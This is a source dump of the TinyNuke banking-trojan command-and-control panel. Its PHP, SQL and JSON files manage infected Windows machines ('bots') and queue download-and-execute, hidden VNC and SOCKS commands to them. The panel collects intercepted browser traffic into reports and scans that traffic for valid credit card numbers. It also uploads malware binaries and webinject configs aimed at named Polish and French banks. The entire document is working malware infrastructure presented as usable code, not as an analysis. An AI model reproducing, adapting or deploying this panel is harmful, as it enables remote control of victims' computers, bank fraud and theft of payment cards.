| { 29 | action_sec_check(); 30 | $query = $db->prepare('INSERT INTO commands (`type`, param, created, `limit`, countries, uhids, execs, enabled) 31 | VALUES (?, ?, ?, ?, ?, ?, 0, 0)'); 32 | $query->bindValue(1, $_POST['type'], PDO::PARAM_INT); 33 | $query->bindValue(2, $_POST['param'], PDO::PARAM_STR); 34 | $query->bindValue(3, time(), PDO::PARAM_INT); 35 | $query->bindValue(4, (int) $_POST['limit'], PDO::PARAM_INT); 36 | $query->bindValue(5, $_POST['countries'], PDO::PARAM_STR); 37 | $query->bindValue(6, $_POST['uhids'], PDO::PARAM_STR); 38 | $query->execute(); 39 | header('location: commands.php'); 40 | exit(); 41 | } 42 | 43 | function 
get_command_name($type) 44 | { 45 | global 46 | $CONST_COMMAND_DL_EXEC, 47 | $CONST_COMMAND_HIDDEN_DESKTOP, 48 | $CONST_COMMAND_SOCKS, 49 | $CONST_COMMAND_UPDATE; 50 | switch($type) 51 | { 52 | case $CONST_COMMAND_DL_EXEC: return 'Download & Execute'; 53 | case $CONST_COMMAND_HIDDEN_DESKTOP: return 'Start VNC'; 54 | case $CONST_COMMAND_SOCKS: return 'Start Socks'; 55 | case $CONST_COMMAND_UPDATE: return 'Update'; 56 | default: return '?'; 57 | } 58 | } 59 | ?> 60 |
61 |
Create
62 |
63 | 64 |
UHIDIPCountryOSComputerUsernameLast SeenFirst Seen
('.$geoip->GEOIP_COUNTRY_NAMES[$geoip->GEOIP_COUNTRY_CODE_TO_NUMBER[$row['country']]].')'); ?> 0 ? ' SP'.$row['service_pack'] : '').' '.($row['is_x64'] ? 'x64' : 'x86')); ?> 115 | '.time_since($row['last_seen']).''); ?> 116 | 117 | 118 | 119 | 121 | '.time_since($row['first_seen']).''); ?> 122 | 124 | Command 125 |
65 | 66 | 67 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 94 | 95 |
Type 68 | 74 |
Execution Limit
Country Codes
UHIDs
Parameter
92 | 93 |
96 | 97 |
98 | query('SELECT * FROM commands'); 100 | if($query->rowCount() > 0) 101 | { 102 | ?> 103 |
104 |
Commands
105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | fetchAll(); 116 | foreach($rows as $row) 117 | { 118 | $emptyHtml = ''; 119 | 120 | if($row['param'] == '') 121 | $param = $emptyHtml; 122 | else 123 | { 124 | $param = htmlspecialchars(substr($row['param'], 0, 30)); 125 | if(strlen($param) < strlen($row['param'])) 126 | $param = ''; 127 | } 128 | echo(' 129 | 130 | 131 | 132 | 133 | 134 | 135 | 146 | '); 147 | } 148 | } 149 | ?> 150 |
TypeCreatedCountry CodesUHIDsExecutedParameter
'.get_command_name($row['type']).''.($row['countries'] == '' ? $emptyHtml : htmlspecialchars($row['countries'])).''.($row['uhids'] == '' ? $emptyHtml : htmlspecialchars($row['uhids'])).''.$row['execs'].' / '.($row['limit'] == 0 ? '∞' : $row['limit']).''.$param.' 136 | 138 | '.($row['enabled'] ? 'Disable' : 'Enable').' 139 | 140 | 141 | 143 | Delete 144 | 145 |
151 |
152 | -------------------------------------------------------------------------------- /panel/db.sql: -------------------------------------------------------------------------------- 1 | /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; 2 | /*!40101 SET NAMES utf8 */; 3 | /*!50503 SET NAMES utf8mb4 */; 4 | /*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */; 5 | /*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */; 6 | 7 | DROP DATABASE IF EXISTS `panel`; 8 | CREATE DATABASE IF NOT EXISTS `panel` /*!40100 DEFAULT CHARACTER SET latin1 */; 9 | USE `panel`; 10 | 11 | DROP TABLE IF EXISTS `bots`; 12 | CREATE TABLE IF NOT EXISTS `bots` ( 13 | `id` int(11) unsigned NOT NULL AUTO_INCREMENT, 14 | `uhid` varchar(50) NOT NULL, 15 | `os_major` tinyint(4) unsigned NOT NULL, 16 | `os_minor` tinyint(4) unsigned NOT NULL, 17 | `service_pack` tinyint(4) unsigned NOT NULL, 18 | `is_server` tinyint(4) unsigned NOT NULL, 19 | `comp_name` varchar(50) NOT NULL, 20 | `user_name` varchar(50) NOT NULL, 21 | `ip` int(11) unsigned NOT NULL, 22 | `is_x64` tinyint(4) unsigned NOT NULL, 23 | `last_seen` int(11) unsigned NOT NULL, 24 | `first_seen` int(11) unsigned NOT NULL, 25 | `country` char(2) NOT NULL, 26 | `last_command` int(11) unsigned NOT NULL, 27 | PRIMARY KEY (`id`), 28 | UNIQUE KEY `uhid` (`uhid`) 29 | ) ENGINE=InnoDB DEFAULT CHARSET=latin1; 30 | 31 | DROP TABLE IF EXISTS `commands`; 32 | CREATE TABLE IF NOT EXISTS `commands` ( 33 | `id` int(11) unsigned NOT NULL AUTO_INCREMENT, 34 | `execs` int(11) unsigned NOT NULL, 35 | `limit` int(11) unsigned NOT NULL, 36 | `enabled` tinyint(4) unsigned NOT NULL, 37 | `created` int(11) unsigned NOT NULL, 38 | `type` tinyint(4) unsigned NOT NULL, 39 | `param` text NOT NULL, 40 | `countries` text NOT NULL, 41 | `uhids` text NOT NULL, 42 | PRIMARY KEY (`id`) 43 | ) ENGINE=InnoDB DEFAULT CHARSET=latin1; 44 | 45 | DROP TABLE IF EXISTS `reports`; 46 | CREATE TABLE IF NOT EXISTS 
`reports` ( 47 | `id` int(11) unsigned NOT NULL AUTO_INCREMENT, 48 | `uhid` varchar(50) NOT NULL, 49 | `software` varchar(20) NOT NULL, 50 | `url` varchar(100) NOT NULL, 51 | `received` int(11) unsigned NOT NULL, 52 | `content` text NOT NULL, 53 | `inject` tinyint(4) unsigned NOT NULL, 54 | `found_card` tinyint(4) unsigned NOT NULL, 55 | PRIMARY KEY (`id`) 56 | ) ENGINE=InnoDB DEFAULT CHARSET=latin1; 57 | 58 | /*!40101 SET SQL_MODE=IFNULL(@OLD_SQL_MODE, '') */; 59 | /*!40014 SET FOREIGN_KEY_CHECKS=IF(@OLD_FOREIGN_KEY_CHECKS IS NULL, 1, @OLD_FOREIGN_KEY_CHECKS) */; 60 | /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; 61 | -------------------------------------------------------------------------------- /panel/geoip.dat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rossja/TinyNuke/c1e04c36d3aa2dbd70fcb17063809798b00b1fcf/panel/geoip.dat -------------------------------------------------------------------------------- /panel/inc/cc.php: -------------------------------------------------------------------------------- 1 | "(4\d{12}(?:\d{3})?)", 7 | "amex" => "(3[47]\d{13})", 8 | "jcb" => "(35[2-8][89]\d\d\d{10})", 9 | "maestro" => "((?:5020|5038|6304|6579|6761)\d{12}(?:\d\d)?)", 10 | "solo" => "((?:6334|6767)\d{12}(?:\d\d)?\d?)", 11 | "mastercard" => "(5[1-5]\d{14})", 12 | "switch" => "(?:(?:(?:4903|4905|4911|4936|6333|6759)\d{12})|(?:(?:564182|633110)\d{10})(\d\d)?\d?)", 13 | ); 14 | $names = array("Visa", "American Express", "JCB", "Maestro", "Solo", "Mastercard", "Switch"); 15 | $matches = array(); 16 | $pattern = "#^(?:".implode("|", $cards).")$#"; 17 | $result = preg_match($pattern, str_replace(" ", "", $cc), $matches); 18 | if($extra_check && $result > 0) 19 | $result = (validatecard($cc)) ? 1 : 0; 20 | return ($result > 0) ? 
$names[sizeof($matches) - 2] : false; 21 | } 22 | 23 | function is_valid_luhn($number) 24 | { 25 | settype($number, 'string'); 26 | $sumTable = array 27 | ( 28 | array(0, 1, 2, 3, 4, 5, 6, 7, 8, 9), 29 | array(0, 2, 4, 6, 8, 1, 3, 5, 7, 9) 30 | ); 31 | $sum = 0; 32 | $flip = 0; 33 | for($i = strlen($number) - 1; $i >= 0; $i--) 34 | $sum += $sumTable[$flip++ & 0x1][$number[$i]]; 35 | return $sum % 10 === 0; 36 | } 37 | 38 | function is_valid_card($str) 39 | { 40 | $strLen = strlen($str); 41 | if($strLen >= 13 && $strLen <= 19) 42 | { 43 | if(is_valid_luhn($str) && check_cc($str) !== false) 44 | return true; 45 | } 46 | return false; 47 | } 48 | 49 | function found_card($str) 50 | { 51 | $str = strstr($str, "\r\n\r\n"); 52 | $currNum = ''; 53 | for($i = 0; $i < strlen($str); ++$i) 54 | { 55 | if(ctype_digit($str[$i])) 56 | $currNum .= $str[$i]; 57 | else if($str[$i] != '+') 58 | { 59 | if(is_valid_card($currNum)) 60 | return true; 61 | $currNum = ''; 62 | } 63 | } 64 | if(is_valid_card($currNum)) 65 | return true; 66 | return false; 67 | } 68 | ?> -------------------------------------------------------------------------------- /panel/inc/common.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /panel/inc/const.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /panel/inc/db.php: -------------------------------------------------------------------------------- 1 | 'SET NAMES "utf8"')); 9 | } 10 | catch(PDOException $e) 11 | { 12 | if($message) 13 | echo 'Can\'t connect to the database. 
Change settings?'; 14 | exit(); 15 | } 16 | } 17 | ?> -------------------------------------------------------------------------------- /panel/inc/ui.php: -------------------------------------------------------------------------------- 1 | 5 | 6 | 7 | 8 | TinyNuke - <?php echo($title); ?> 9 | 10 | 11 | 17 | 18 | 19 | '.$text.''); 25 | } 26 | 27 | function ui_content_start() 28 | { 29 | ?> 30 | 39 |
40 | 46 |
47 |
48 | 49 | 55 | 56 | 57 | -------------------------------------------------------------------------------- /panel/inc/utils.php: -------------------------------------------------------------------------------- 1 | No file uploaded'); 28 | } 29 | 30 | function gen_qmarks($arr) 31 | { 32 | return str_repeat('?, ', count($arr) - 1).'?'; 33 | } 34 | 35 | function get_pag_vars($total, &$pages, &$page, &$offset) 36 | { 37 | global $CONST_PAGE_LIMIT; 38 | $pages = ceil($total / $CONST_PAGE_LIMIT); 39 | $page = 1; 40 | if(isset($_GET['page'])) 41 | { 42 | $page = (int) $_GET['page']; 43 | if($page > $pages) 44 | $page = $pages; 45 | else if($page < 1) 46 | $page = 1; 47 | } 48 | $offset = ($page - 1) * $CONST_PAGE_LIMIT; 49 | } 50 | 51 | function get_os($majorVer, $minorVer, $server) 52 | { 53 | if($majorVer == 5) 54 | { 55 | if(!$server) 56 | return 'Windows XP'; 57 | else 58 | return 'Windows 2003'; 59 | } 60 | if($majorVer == 6 && $minorVer == 0) 61 | { 62 | if(!$server) 63 | return 'Windows Vista'; 64 | else 65 | return 'Windows Server 2008'; 66 | } 67 | if($majorVer == 6 && $minorVer == 1) 68 | { 69 | if(!$server) 70 | return 'Windows 7'; 71 | else 72 | return 'Windows Server 2008 R2'; 73 | } 74 | if($majorVer == 6 && $minorVer == 2) 75 | { 76 | if(!$server) 77 | return 'Windows 8'; 78 | else 79 | return 'Windows Server 2012'; 80 | } 81 | if($majorVer == 6 && $minorVer == 3) 82 | { 83 | if(!$server) 84 | return 'Windows 8.1'; 85 | else 86 | return 'Windows Server 2012 R2'; 87 | } 88 | if($majorVer == 10 && $minorVer == 0) 89 | { 90 | if(!$server) 91 | return 'Windows 10'; 92 | else 93 | return 'Windows Server 2016'; 94 | } 95 | else 96 | return '?'; 97 | } 98 | 99 | function format_time($time) 100 | { 101 | return date('d/m/Y H:i:s', $time); 102 | } 103 | 104 | function time_since($time) 105 | { 106 | $time = time() - $time; 107 | $time = ($time < 1) ? 
1 : $time; 108 | $tokens = array ( 109 | 31536000 => 'year', 110 | 2592000 => 'month', 111 | 604800 => 'week', 112 | 86400 => 'day', 113 | 3600 => 'hour', 114 | 60 => 'minute', 115 | 1 => 'second' 116 | ); 117 | 118 | foreach($tokens as $unit => $text) 119 | { 120 | if($time < $unit) continue; 121 | $numberOfUnits = floor($time / $unit); 122 | return $numberOfUnits.' '.$text.(($numberOfUnits > 1) ? 's' : '').' ago'; 123 | } 124 | } 125 | 126 | function is_online($time) 127 | { 128 | global $CONF_TIMEOUT_OFFLINE; 129 | return (time() - $time) < $CONF_TIMEOUT_OFFLINE ; 130 | } 131 | 132 | function echo_hidden_fields() 133 | { 134 | $args = func_get_args(); 135 | foreach($_GET as $name => $value) 136 | { 137 | if(!in_array($name, $args)) 138 | echo(''); 139 | } 140 | } 141 | 142 | function echo_pag_form($page, $pages) 143 | { 144 | $firstDisabled = $page == 1 ? 'disabled' : ''; 145 | echo('
First'); 146 | echo(' Previous'); 147 | echo_hidden_fields('page'); 148 | echo(' '); 150 | $lastDisabled = $page == $pages ? 'disabled' : ''; 151 | echo(' Next'); 152 | echo(' Last
'); 153 | } 154 | 155 | function add_get_param($name, $value) 156 | { 157 | $params = $_GET; 158 | unset($params[$name]); 159 | $params[$name] = $value; 160 | return basename($_SERVER['PHP_SELF']).'?'.http_build_query($params); 161 | } 162 | 163 | function action_sec_check() 164 | { 165 | if($_SERVER['REQUEST_METHOD'] == 'POST') 166 | $userTime = $_POST['time']; 167 | else 168 | $userTime = $_GET['time']; 169 | if($userTime != $_SESSION['time']) 170 | exit(); 171 | } 172 | ?> -------------------------------------------------------------------------------- /panel/index.php: -------------------------------------------------------------------------------- 1 | '); 18 | header('location: index.php'); 19 | exit(); 20 | } 21 | if(isset($_GET['delete_host'])) 22 | { 23 | action_sec_check(); 24 | $hosts = array_diff($hosts, array($_GET['delete_host'])); 25 | if($hosts == null) 26 | $hosts = array(); 27 | delete_insert_host(); 28 | } 29 | else if(isset($_POST['host'])) 30 | { 31 | action_sec_check(); 32 | array_push($hosts, $_POST['host']); 33 | delete_insert_host(); 34 | } 35 | 36 | ui_start('Statistics'); 37 | ui_content_start(); 38 | 39 | function format_count($count) 40 | { 41 | global $total; 42 | if($total == 0 && $count == 0) 43 | $total = 1; 44 | return $count.' ('.round(($count / $total) * 100, 2).'%)'; 45 | } 46 | 47 | $query = $db->query('SELECT COUNT(*) FROM bots'); 48 | $totalBots = $query->fetchColumn(); 49 | 50 | $total = $totalBots; 51 | 52 | if($total == 0) 53 | echo('
Database is empty
'); 54 | else 55 | { 56 | ?> 57 | 82 |
83 | prepare('SELECT COUNT(*) FROM bots WHERE last_seen > ?'); 85 | $query->bindValue(1, time() - $CONF_TIMEOUT_OFFLINE, PDO::PARAM_INT); 86 | $query->execute(); 87 | $online = (int) $query->fetchColumn(); 88 | $offline = $total - $online; 89 | 90 | $query = $db->prepare('SELECT COUNT(*) FROM bots WHERE last_seen < ?'); 91 | $query->bindValue(1, time() - $CONF_TIMEOUT_DEAD, PDO::PARAM_INT); 92 | $query->execute(); 93 | $dead = $query->fetchColumn(); 94 | 95 | $query = $db->prepare('SELECT COUNT(*) FROM bots WHERE last_seen > ?'); 96 | $query->bindValue(1, time() - 60 * 60 * 24, PDO::PARAM_INT); 97 | $query->execute(); 98 | $online24h = (int) $query->fetchColumn(); 99 | ?> 100 |
101 |
Amount
102 | 103 | 104 | 105 | 106 | 107 | 108 |
Total:
Online:
Offline:
Bots seen since 24h:
Dead:
109 |
110 | query('SELECT COUNT(*) FROM bots WHERE is_x64 = 1'); 112 | $x64 = $query->fetchColumn(); 113 | 114 | $os = array(); 115 | $query = $db->query('SELECT os_major, os_minor, is_server FROM bots'); 116 | $rows = $query->fetchAll(); 117 | foreach($rows as $row) 118 | { 119 | $osName = get_os($row['os_major'], $row['os_minor'], $row['is_server']); 120 | if(isset($os[$osName])) 121 | ++$os[$osName]; 122 | else 123 | $os[$osName] = 1; 124 | } 125 | arsort($os); 126 | ?> 127 |
128 |
Computer Info
129 | 130 | $value) 132 | echo(''); 133 | ?> 134 | 135 | 136 |
'.$key.':'.format_count($value).'
x64:
x86:
137 |
138 |
139 |
Countries
140 | 141 | query('SELECT DISTINCT country, COUNT(*) as num FROM bots GROUP BY country ORDER BY num DESC'); 144 | $rows = $query->fetchAll(); 145 | $geoip = new GeoIP(); 146 | foreach($rows as $row) 147 | { 148 | echo(''); 149 | } 150 | ?> 151 |
'.$row['country'].' ('.$geoip->GEOIP_COUNTRY_NAMES[$geoip->GEOIP_COUNTRY_CODE_TO_NUMBER[$row['country']]].'):'.format_count($row['num']).'
152 |
153 |
154 | query('SELECT COUNT(*) FROM reports'); 156 | $total = $query->fetchColumn(); 157 | 158 | $query = $db->prepare('SELECT COUNT(*) FROM reports WHERE received > ?'); 159 | $query->bindValue(1, time() - 60 * 60 * 24, PDO::PARAM_INT); 160 | $query->execute(); 161 | $logs24h = $query->fetchColumn(); 162 | ?> 163 |
164 |
165 |
Logs
166 | 167 | 168 | 169 |
Total:
Last 24h:
170 |
171 |
172 |
Top Hosts
173 | 174 | '.htmlspecialchars($host).''); 179 | } 180 | $query = $db->query($sql_host.'GROUP BY host ORDER BY num DESC LIMIT 100'); 181 | $rows = $query->fetchAll(); 182 | foreach($rows as $row) 183 | { 184 | echo(''); 185 | echo_host_row($row['host'], $row['num']); 186 | echo(''); 187 | } 188 | ?> 189 |
'.$num.'
190 |
191 |
192 |
Pinned Hosts
193 | 0) 195 | { 196 | ?> 197 | 198 | prepare($sql_host.' GROUP BY host HAVING host LIKE ?'); 202 | $query->bindValue(1, $host, PDO::PARAM_STR); 203 | $query->execute(); 204 | echo(''); 205 | echo_host_row(htmlspecialchars($host), $query->rowCount() > 0 ? $query->fetchAll()[0]['num'] : 0); 206 | echo(''); 207 | } 208 | ?> 209 |
Delete
210 | 213 |
214 |
215 | 216 | 217 |
218 |
219 |
220 |
221 | -------------------------------------------------------------------------------- /panel/login.php: -------------------------------------------------------------------------------- 1 | '); 33 | ?> -------------------------------------------------------------------------------- /panel/pinned_hosts.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /panel/private/.htaccess: -------------------------------------------------------------------------------- 1 | deny from all -------------------------------------------------------------------------------- /panel/private/injects.json: -------------------------------------------------------------------------------- 1 | { 2 | "fg_blacklist": [ "*ocsp*.*", "*symc*.com*", "*clients*.google.com*", "*telemetry.mozilla.org*", "*facebook.com/ajax/*", "*safebrowsing.google.com*", "*services.mozilla.com*" ], 3 | "injects": 4 | [ 5 | { 6 | "host": "bosbank24.pl", 7 | "path": "*", 8 | "content": 9 | [ 10 | { 11 | "code": "", 12 | "before": "", 13 | "after": "" 14 | } 15 | ] 16 | }, 17 | { 18 | "host": "ebanknet.bsprudnik.pl", 19 | "path": "*", 20 | "content": 21 | [ 22 | { 23 | "code": "eBankNet", 24 | "before": "", 25 | "after": "" 26 | } 27 | ] 28 | }, 29 | { 30 | "host": "www.hsbc.fr", 31 | "path": "*", 32 | "content": 33 | [ 34 | { 35 | "code": "", 36 | "before": "", 37 | "after": "" 38 | } 39 | ] 40 | } 41 | ] 42 | } -------------------------------------------------------------------------------- /panel/reports.php: -------------------------------------------------------------------------------- 1 | prepare('SELECT content FROM reports WHERE id = ?'); 10 | $query->bindValue(1, $_GET['view_content'], PDO::PARAM_INT); 11 | $query->execute(); 12 | echo $query->fetchColumn(); 13 | exit(); 14 | } 15 | 16 | ui_start('Reports'); 17 | ui_content_start(); 18 | ?> 19 |
20 |
Search
21 |
22 | 23 | 24 | 25 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 99 | 100 |
Date 26 | prepare('SELECT received FROM reports ORDER BY received DESC LIMIT 1'); 28 | $query->execute(); 29 | $new_received = (int) $query->fetchColumn(); 30 | 31 | $query = $db->prepare('SELECT received FROM reports ORDER BY received ASC LIMIT 1'); 32 | $query->execute(); 33 | $old_received = (int) $query->fetchColumn(); 34 | 35 | function day_min($time) 36 | { 37 | return strtotime(date('Y-m-d 00:00:00', $time)); 38 | } 39 | 40 | function day_max($time) 41 | { 42 | return strtotime(date('Y-m-d 23:59:59', $time)); 43 | } 44 | $new_received_min = day_min($new_received); 45 | $old_received_min = day_min($old_received); 46 | ?> 47 | 55 | to 56 | 64 |
URL
Content
UHIDs
WebInject
Contains CC
89 | 90 | Order By 91 | 94 | 98 |
101 |
102 |
103 | $_GET['date_max']) 107 | echo('
First date can\'t be later then the second one
'); 108 | else 109 | { 110 | $sqlWhere = ''; 111 | if($_GET['uhids'] != '') 112 | { 113 | $uhids = explode(' ', $_GET['uhids']); 114 | $sqlWhere .= ' AND uhid IN ('.gen_qmarks($uhids).')'; 115 | } 116 | if($_GET['url'] != '') 117 | $sqlWhere .= ' AND url LIKE ?'; 118 | if($_GET['content'] != '') 119 | $sqlWhere .= ' AND content LIKE ?'; 120 | if(isset($_GET['inject'])) 121 | $sqlWhere .= ' AND inject = 1'; 122 | if(isset($_GET['card'])) 123 | $sqlWhere .= ' AND foundCard = 1'; 124 | 125 | $sqlWhere .= ' AND (received >= ? AND received <= ?)'; 126 | 127 | function bind_values() 128 | { 129 | global $query, $uhids, $i; 130 | if($_GET['uhids'] != '') 131 | { 132 | foreach($uhids as $uhid) 133 | $query->bindValue(++$i, $uhid, PDO::PARAM_STR); 134 | } 135 | if($_GET['url'] != '') 136 | $query->bindValue(++$i, $_GET['url'], PDO::PARAM_STR); 137 | if($_GET['content'] != '') 138 | $query->bindValue(++$i, $_GET['content'], PDO::PARAM_STR); 139 | 140 | $query->bindValue(++$i, $_GET['date_min'], PDO::PARAM_INT); 141 | $query->bindValue(++$i, $_GET['date_max'], PDO::PARAM_INT); 142 | } 143 | 144 | $query = $db->prepare('SELECT COUNT(*) FROM reports WHERE 1 = 1'.$sqlWhere); 145 | $i = 0; 146 | bind_values(); 147 | $query->execute(); 148 | $total = $query->fetchColumn(); 149 | if($total == 0) 150 | echo('
No reports found
'); 151 | else 152 | { 153 | get_pag_vars($total, $pages, $page, $offset); 154 | $query = $db->prepare('SELECT * FROM reports WHERE 1 = 1'.$sqlWhere.' 155 | ORDER BY received '.($_GET['dir'] == 1 ? 'ASC' : 'DESC').' LIMIT ? OFFSET ?'); 156 | $i = 0; 157 | bind_values(); 158 | $query->bindValue(++$i, $CONST_PAGE_LIMIT, PDO::PARAM_INT); 159 | $query->bindValue(++$i, $offset, PDO::PARAM_INT); 160 | $query->execute(); 161 | ?> 162 |
163 |
Reports
164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | fetchAll(); 173 | foreach($rows as $row) 174 | { 175 | $url = htmlspecialchars(substr($row['url'], 0, 70)); 176 | if(strlen($url) < strlen($row['url'])) 177 | $url = ''; 178 | echo(' 179 | 180 | 181 | 182 | 183 | 192 | '); 193 | } 194 | ?> 195 |
URLBrowserUHIDReceived
'.$url.''.htmlspecialchars($row['software']).''.htmlspecialchars($row['uhid']).' 184 | 185 | View Content 186 | 187 | 189 | Bot Info 190 | 191 |
196 | 199 |
200 | -------------------------------------------------------------------------------- /panel/settings.php: -------------------------------------------------------------------------------- 1 | Settings updated'); 16 | } 17 | 18 | function write_settings() 19 | { 20 | global 21 | $CONF_TIMEOUT_OFFLINE, 22 | $CONF_TIMEOUT_DEAD, 23 | $CONF_DB_HOST, 24 | $CONF_DB_NAME, 25 | $CONF_DB_USER, 26 | $CONF_DB_PASS, 27 | $CONF_SERVER_HIDDEN_DESKTOP, 28 | $CONF_SERVER_SOCKS, 29 | $CONF_PANEL_USER, 30 | $CONF_PANEL_PASS; 31 | file_put_contents 32 | ( 33 | 'settings_data.php', 34 | '' 46 | ); 47 | echo_settings_updated_info(); 48 | } 49 | 50 | if(isset($_POST['timeout_offline'])) 51 | { 52 | action_sec_check(); 53 | if(!ctype_digit($_POST['timeout_offline']) || !ctype_digit($_POST['timeout_dead'])) 54 | echo('
Invalid timeout value
'); 55 | else 56 | { 57 | $CONF_TIMEOUT_OFFLINE = $_POST['timeout_offline']; 58 | $CONF_TIMEOUT_DEAD = $_POST['timeout_dead']; 59 | write_settings(); 60 | } 61 | } 62 | else if(isset($_POST['db_name'])) 63 | { 64 | action_sec_check(); 65 | $CONF_DB_HOST = $_POST['db_host']; 66 | $CONF_DB_NAME = $_POST['db_name']; 67 | $CONF_DB_USER = $_POST['db_user']; 68 | $CONF_DB_PASS = $_POST['db_pass']; 69 | write_settings(); 70 | } 71 | else if(isset($_POST['server_hidden_desktop'])) 72 | { 73 | action_sec_check(); 74 | $CONF_SERVER_HIDDEN_DESKTOP = $_POST['server_hidden_desktop']; 75 | $CONF_SERVER_SOCKS = $_POST['server_socks']; 76 | write_settings(); 77 | } 78 | else if(isset($_POST['pass'])) 79 | { 80 | action_sec_check(); 81 | if($_POST['pass'] === $_POST['pass2']) 82 | { 83 | $minChars = 4; 84 | if(strlen($_POST['pass']) >= $minChars && strlen($_POST['user']) >= $minChars) 85 | { 86 | $CONF_PANEL_USER = $_POST['user']; 87 | $CONF_PANEL_PASS = hash_pass($_POST['pass']); 88 | write_settings(); 89 | } 90 | else 91 | echo('
User and password must be at least '.$minChars.' characters long
'); 92 | } 93 | else 94 | echo('
Passwords are not the same
'); 95 | } 96 | else if(isset($_FILES['injects_file'])) 97 | { 98 | action_sec_check(); 99 | if($_FILES['injects_file']['error'] != UPLOAD_ERR_OK) 100 | echo_file_upload_error(); 101 | else 102 | { 103 | $json = file_get_contents($_FILES['injects_file']['tmp_name']); 104 | json_decode($json); 105 | if(json_last_error() != JSON_ERROR_NONE) 106 | echo('
Json is invalid
'); 107 | else 108 | { 109 | move_uploaded_file($_FILES['injects_file']['tmp_name'], $CONST_INJECTS_PATH); 110 | echo_settings_updated_info(); 111 | } 112 | } 113 | } 114 | else if(isset($_FILES['x64_bin'])) 115 | { 116 | action_sec_check(); 117 | function is_valid_pe($file) 118 | { 119 | $contents = file_get_contents($file['tmp_name']); 120 | $size = $file['size']; 121 | if($size < 1024) 122 | return false; 123 | if($contents[0] != 'M' || $contents[1] != 'Z') 124 | return false; 125 | return true; 126 | } 127 | if($_FILES['x64_bin']['error'] != UPLOAD_ERR_OK || $_FILES['x86_bin']['error'] != UPLOAD_ERR_OK) 128 | echo_file_upload_error(); 129 | else if(is_valid_pe($_FILES['x64_bin']) && is_valid_pe($_FILES['x86_bin'])) 130 | { 131 | move_uploaded_file($_FILES['x64_bin']['tmp_name'], $CONST_X64_BIN_PATH); 132 | move_uploaded_file($_FILES['x86_bin']['tmp_name'], $CONST_X86_BIN_PATH); 133 | echo_settings_updated_info(); 134 | } 135 | else 136 | echo('
Invalid PE file
'); 137 | } 138 | ?> 139 | 164 |
165 |
166 |
Update Timeouts (Seconds)
167 | 168 | 169 | 170 | 171 | 172 |
Offline
Dead
173 |
174 |
175 |
Update Database Credentials
176 | 177 | 178 | 179 | 180 | 181 | 182 | 183 |
Host
Name
User
Password
184 |
185 |
186 |
Update Server Addresses
187 | 188 | 189 | 190 | 191 | 192 |
VNC
SOCKS
193 |
194 |
195 |
196 |
197 |
Update Panel Credentials
198 | 199 | 200 | 201 | 202 | 203 | 204 |
User
Password
Password Verification
205 |
206 |
207 |
Upload WebInjects
208 | 209 | 210 | 211 | 212 |
FileView Current WebInjects
213 |
214 |
215 |
Upload Binaries
216 | 217 | 218 | 219 | 220 | 221 |
x64
x86
222 |
223 |
224 | -------------------------------------------------------------------------------- /panel/settings_data.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /panel/style/style.css: -------------------------------------------------------------------------------- 1 | body 2 | { 3 | font-size: 12px; 4 | font-family: Verdana, Geneva, sans-serif; 5 | background: #FFF; 6 | width: 1100px; 7 | margin: auto; 8 | padding-top: 10px; 9 | background: #F2F2F2; 10 | } 11 | 12 | .nav 13 | { 14 | padding: 2px 5px; 15 | } 16 | 17 | .nav a, .btn 18 | { 19 | border: 1px solid #888; 20 | color: #666; 21 | text-decoration: none; 22 | margin-right: -1px; 23 | padding: 2px 20px; 24 | background: #F2F2F2; 25 | background-image: linear-gradient(to top, #E8E8E8 0%, #FFF 50%, #F7F7F7 100%); 26 | position: relative; 27 | border-radius: 2px; 28 | } 29 | 30 | .btn 31 | { 32 | color: #000; 33 | } 34 | 35 | .nav a 36 | { 37 | border-bottom-left-radius: 0px; 38 | border-bottom-right-radius: 0px; 39 | padding: 2px 20px; 40 | } 41 | 42 | .nav a:hover, .btn:hover 43 | { 44 | background-image: linear-gradient(to bottom, #E8E8E8 0%, #FFF 50%, #F7F7F7 100%); 45 | } 46 | 47 | .nav a.current 48 | { 49 | background: #F7F7F7; 50 | border-bottom: 1px solid #F7F7F7; 51 | padding-top: 4px; 52 | box-shadow: 5px 0 5px -5px #AAA, -5px 0 5px -5px #AAA; 53 | z-index: 1; 54 | color: #000; 55 | } 56 | 57 | .nav a.current:first-child 58 | { 59 | box-shadow: 5px 0 5px -5px #AAA; 60 | } 61 | 62 | .nav a.current:last-child 63 | { 64 | box-shadow: -5px 0 5px -5px #AAA; 65 | } 66 | 67 | .content 68 | { 69 | border: 1px solid #888; 70 | padding: 10px; 71 | background: #F7F7F7; 72 | } 73 | 74 | .input 75 | { 76 | padding: 2px; 77 | border: 1px solid #888; 78 | border-radius: 2px; 79 | -ms-box-sizing: content-box; 80 | -moz-box-sizing: content-box; 81 | -webkit-box-sizing: content-box; 82 | box-sizing: 
